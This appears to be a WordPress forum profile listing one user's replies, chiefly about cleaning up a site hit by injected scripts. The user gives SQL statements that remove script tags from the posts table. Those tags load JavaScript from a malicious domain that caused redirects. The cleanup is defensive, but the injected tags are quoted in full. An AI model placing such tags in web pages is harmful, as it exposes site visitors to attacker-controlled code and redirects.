asmo111
Forum Replies Created
-
To remove the script from Database any of this 3 may help. You need to identified which. Also replace the prefix with yours
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5' type='text/javascript'></script>", " ")); UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>", " ")); UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>", " "));It also infects the wp_post data base, php files an js. It is a complete mess
Last Friday the script was
<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>Today it change to
<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>also de ns1 changes sometimes to ns5
- This reply was modified 5 years, 8 months ago by Yui. Reason: please use CODE button for proper formatting
Same problem. I manually clear all scripts generated all over the site in all php and js files. Fresh copy of WordPress, Plugins, Theme. Also delete more than 300 script lines generated at data base. Wordfence help to find infected files… but the redirection continues. After 2 days trying everything no idea what to do.
Forum: Plugins
In reply to: [Colorful Categories] Post title on blog page in selected colourSame question, is possible?
consulthawkins totally agree with you. I lost an entire day trying to restore a backup and it didn’t work. I try in a accepted hosting company bluehost…and the upload stuck at 0.03%, tried in another hosting company Inmotion, stuck at 40%, then in 43% then in 36%. Change .ini files, wp-config files, .htaccess and nothing!!! So what I think? If you want it to work pay. At least I learn at the hard way. Never again!
Forum: Themes and Templates
In reply to: Really weird problems after trying to add to slideshow!Hi adibla2, I see that you fix that problem. I’m having the same issue that images in slide not appear. How do you fix that? Thanks